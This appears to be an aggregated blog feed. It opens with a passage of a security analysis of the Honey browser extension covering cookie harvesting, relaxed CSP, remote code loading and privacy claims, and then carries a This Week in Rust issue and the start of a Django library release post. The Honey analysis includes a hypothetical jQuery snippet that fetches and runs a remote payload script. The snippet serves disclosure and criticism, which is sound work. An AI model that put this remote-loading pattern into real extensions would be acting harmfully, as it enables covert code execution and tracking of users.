It seems that the purpose of this code is extracting user identifiers from various advertising cookies. Here is an excerpt:
var cs = {
CONTID: {
name: 'CONTID',
url: 'https://www.cj.com',
exVal: null
},
s_vi: {
name: 's_vi',
url: 'https://www.linkshare.com',
exVal: null
},
_ga: {
name: '_ga',
url: 'https://www.rakutenadvertising.com',
exVal: null
},
...
};
The extension conveniently grants this code access to all cookies on any domain. This is only the case on Chrome, however; on Firefox the extension doesn't request access to cookies, most likely to address concerns that Mozilla Add-ons reviewers had.
The script also has access to jQuery. With the relaxed CSP protection of the Chrome version, this allows it to load any script from paypal.com and some other domains at will. These scripts will be able to do anything that the extension can do: read or change website cookies, track the user’s browsing in arbitrary ways, inject code into websites or even modify server responses.
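As a purely hypothetical illustration (the URL below is invented and this is not code observed in the extension), such an escalation could be as simple as:
// Hypothetical sketch, not code observed in the extension: with jQuery available in
// the background page and a CSP that allows scripts from paypal.com, remotely
// supplied code could load and execute an arbitrary script there.
$.getScript("https://www.paypal.com/some/invented/path/payload.js") // URL made up for illustration
  .done(() => {
    // the loaded script now runs with the extension's privileges: cookies,
    // request interception, injecting code into tabs, and so on
  });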
On Firefox the fallout is more limited. So far I could only think of one rather exotic possibility: add a frame to the extension’s background page. This would allow loading an arbitrary web page that would stay around for the duration of the browsing session while being invisible. This attack could be used for cryptojacking for example.
About that privacy commitment…
The Honey Privacy and Security policy states:
We will be transparent with what data we collect and how we use it to save you time and money, and you can decide if you’re good with that.
This sounds pretty good. But if I still have you here, I want to take a brief look at what this means in practice.
As the privacy policy explains, Honey collects information on the availability and prices of items with your help. Opening a single Amazon product page results in numerous requests reporting such data.
The code responsible for the data sent here is only partly contained in the extension; much of it is loaded from the server as yet another block of obfuscated VIM code. That's definitely an unusual way to ensure transparency…
On the bright side, this particular part of Honey's functionality can be disabled. That is, if you find the "off" switch. Rather counter-intuitively, this setting is part of your account settings on the Honey website, and after reading its description I was still no wiser. If you don't have a Honey account, it seems that there is no way for you to disable this at all. Either way, from what I can tell this setting won't affect other tracking like the pns_siteSelSubId1 functionality outlined above.
On a side note, I couldn’t fail to notice one more interesting feature not mentioned in the privacy policy. Honey tracks ad blocker usage, and it will even re-run certain tracking requests from the extension if blocked by an ad blocker. So much for your privacy choices.
Why you should care
In the end, I found that the Honey browser extension gives its server very far-reaching privileges, but I did not find any evidence of these privileges being misused. So is it all fine and nothing to worry about? Unfortunately, it's not that easy.
While the browser extension's codebase is massive and I certainly didn't see all of it, it's possible to make definitive statements about the extension's behavior. Unfortunately, the same isn't true for a web server that one can only observe from the outside. The fact that I only saw non-malicious responses doesn't mean that it will stay that way in the future, or that other people will have the same experience.
In fact, if the server were to invade users’ privacy or do something outright malicious, it would likely try to avoid detection. One common way is to only do it for accounts that accumulated a certain amount of history. As security researchers like me usually use fairly new accounts, they won’t notice anything. Also, the server might decide to limit such functionality to countries where litigation is less likely. So somebody like me living in Europe with its strict privacy laws won’t see anything, whereas US citizens would have all of their data extracted.
But let’s say that we really trust Honey Science LLC given its great track record. We even trust PayPal who happened to acquire Honey this year. Maybe they really only want to do the right thing, by any means possible. Even then there are still at least two scenarios for you to worry about.
The Honey server infrastructure makes an extremely lucrative target for hackers. Whoever manages to gain control of it will gain control of the browsing experience for all Honey users. They will be able to extract valuable data like credit card numbers, impersonate users (e.g. to commit ad fraud), take over users’ accounts (e.g. to demand ransom) and more. Now think again how much you trust Honey to keep hackers out.
But even if Honey had perfect security, they are also a US-based company. And that means that at any time a three letter agency can ask them for access, and they will have to grant it. That agency might be interested in a particular user, and Honey provides the perfect infrastructure for a targeted attack. Or the agency might want data from all users, something that they are also known to do occasionally. Honey can deliver that as well.
And that’s the reason why Mozilla’s Add-on Policies list the following requirement:
Add-ons must be self-contained and not load remote code for execution
So it's very surprising that the Honey browser extension in its current form is not merely allowed on Mozilla Add-ons but also marked as "Verified." I wonder what kind of review process this extension went through such that none of the remote code execution mechanisms were detected.
Edit (2020-10-28): As Hubert Figuière pointed out, extensions acquire this "Verified" badge by paying for the review. All the more interesting to learn what kind of review was paid for here.
While the Chrome Web Store is more relaxed on this front, its Developer Program Policies also list the following requirement:
Developers must not obfuscate code or conceal functionality of their extension. This also applies to any external code or resource fetched by the extension package.
I'd say that the VIM mechanism clearly violates that requirement as well. As I have yet to discover a working mechanism for reporting violations of Chrome's Developer Program Policies, it remains to be seen whether this will have any consequences.
Posted over 4 years ago by TWiR Contributors
Hello and welcome to another issue of This Week in Rust!
Rust is a systems language pursuing the trifecta: safety, concurrency, and speed.
This is a weekly summary of its progress and community.
Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request.
Want to get involved? We love contributions.
This Week in Rust is openly developed on GitHub.
If you find any errors in this week's issue, please submit a PR.
RustFest Global
The RustFest schedule is now online! RustFest offers free tickets until November 1st. It happens across all timezones and is accessible to everyone!
Updates from Rust Community
No newsletters this week.
Official
[Inside] Core team membership changes
Tooling
Rust Analyzer Changelog #48
Knurling-rs Changelog #3
Observations/Thoughts
Fighting Rust's Expressive Type System
XMHell: Handling 38GB of UTF-16 XML with Rust
LudumDare 47 - The Island
Building a Recipe Manager - Part 3 - Parsing and more Druid
Imitating specialization with OIBITs
Flask Creator Armin Ronacher Interview
clue solver now in Rust with more accurate simulations!
Learn Rust
Rust for a Gopher Lesson 1
Rust for a Gopher Lesson 2
Build a "todo list" backend with AssemblyLift 🚀🔒
So you want to write object oriented Rust
[series] A Web App in Rust
Contributing to the IntelliJ Rust plugin: Implementing a refactoring
5x Faster Rust Docker Builds with cargo-chef
Writing a simple AWS Lambda Custom Runtime in Rust
Is Rust Web Yet? Yes, and it's freaking fast!
[video] (Live Coding) Audio adventures in Rust: Local files playback & library interface
Project Updates
Introducing Ungrammar
A new group of maintainers has taken ownership of the deps.rs project and revived the deps.rs page, making the page and generated badges for READMEs usable again.
Miscellaneous
Sandbox Rust Development with Rust Analyzer
[audio] Security Headlines: Tokio special with Carl Lerche
Crate of the Week
This week's crate is rust-gpu from Embark Studios, a system to compile Rust code into Vulkan graphics shaders (with other shader types to follow).
Thanks to Vlad Frolov for the suggestion!
Submit your suggestions and votes for next week!
Call for Participation
Always wanted to contribute to open-source projects but didn't know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!
Some of these tasks may also have mentors available, visit the task page for more information.
heed - Create two different libraries: heed and heedx
If you are a Rust project owner and are looking for contributors, please submit tasks here.
Updates from Rust Core
400 pull requests were merged in the last week
tweak if let suggestion to be more liberal with suggestion and to not ICE
reduce diagram mess in 'match arms have incompatible types' error
tweak match arm semicolon removal suggestion to account for futures
explain where the closure return type was inferred
rewrite collect_tokens implementations to use a flattened buffer
fix trait solving ICEs
stop promoting union field accesses in 'const'
ensure that statics are inhabited
rustc_mir: track inlined callees in SourceScopeData
optimize const value interning for ZST types
calculate visibilities once in resolve
mir-opt: disable MatchBranchSimplification
implement TryFrom between NonZero types
add Pin::static_ref, static_mut
support custom allocators in Box
hashbrown: parametrize RawTable, HashSet and HashMap over an allocator
rustdoc: greatly improve display for small mobile devices screens
clippy: add linter for a single element for loop
clippy: add lint for &mut Mutex::lock
clippy: add new lint for undropped ManuallyDrop values
clippy: lint unnecessary int-to-int and float-to-float casts
Rust Compiler Performance Triage
2020-10-27:
0 Regressions, 2 Improvements, 3 Mixed
See the full report for more.
Approved RFCs
Changes to Rust follow the Rust RFC (request for comments) process. These
are the RFCs that were approved for implementation this week:
Destructuring assignment
RFC: Reading into uninitialized buffers
RFC: Promote aarch64-unknown-linux-gnu to a Tier-1 Rust target
Final Comment Period
Every week the team announces the
'final comment period' for RFCs and key PRs which are reaching a
decision. Express your opinions now.
RFCs
YieldSafe auto trait
Variadic tuples
RFC for a match based surface syntax to get pointer-to-field
Tracking Issues & PRs
[disposition: merge] Allow making RUSTC_BOOTSTRAP conditional on the crate name
[disposition: merge] consider assignments of union field of ManuallyDrop type safe
[disposition: merge] Define fs::hard_link to not follow symlinks.
[disposition: merge] repr(transparent) on generic type skips "exactly one non-zero-sized field" check
[disposition: merge] Rename/Deprecate LayoutErr in favor of LayoutError
[disposition: merge] Tracking Issue for raw_ref_macros
New RFCs
RFC: Plan to make core and std's panic identical.
Upcoming Events
Online
October 29. Berlin, DE - Rust Hack and Learn - Berline.rs
November 4. Johannesburg, ZA - Monthly Joburg Rust Chat! - Johannesburg Rust Meetup
November 4. Dublin, IE - Rust Dublin November - Rust Dublin
November 4. Indianapolis, IN, US - Indy.rs - with Social Distancing - Indy.rs
November 7 & 8, Global, RustFest Global
November 10, Seattle, WA, US - Seattle Rust Meetup
Asia Pacific
November 1. Auckland, NZ - Rust meetup - Introduction to Rust - Rust AKL
If you are running a Rust event please add it to the calendar to get
it mentioned here. Please remember to add a link to the event too.
Email the Rust Community Team for access.
Rust Jobs
Software Engineer - Rust at IOHK (Remote - EU Time Zone)
Senior Software Engineer - Data Access at Roblox (San Mateo, CA)
Tweet us at @ThisWeekInRust to get your job offers listed here!
Quote of the Week
what many devs often miss initially when talking about Rust is that it isn't just about the design & details of the language (which is great), Rust's super power is that in combination with its fantastic community & ecosystem, and the amazing friendly people that create & form it
– Johann Andersson on twitter
llogiq is pretty pleased with his own suggestion and unanimously voted for it.
Please submit quotes and vote for next week!
This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.
Discuss on r/rust
Posted over 4 years ago by Patrick Cloke
A couple of weeks ago I released version 0.8 of django-render-block; this was followed up with 0.8.1 to fix a regression.
django-render-block is a small library that allows you to render a specific block from a Django (or Jinja) template; this is frequently used for emails when …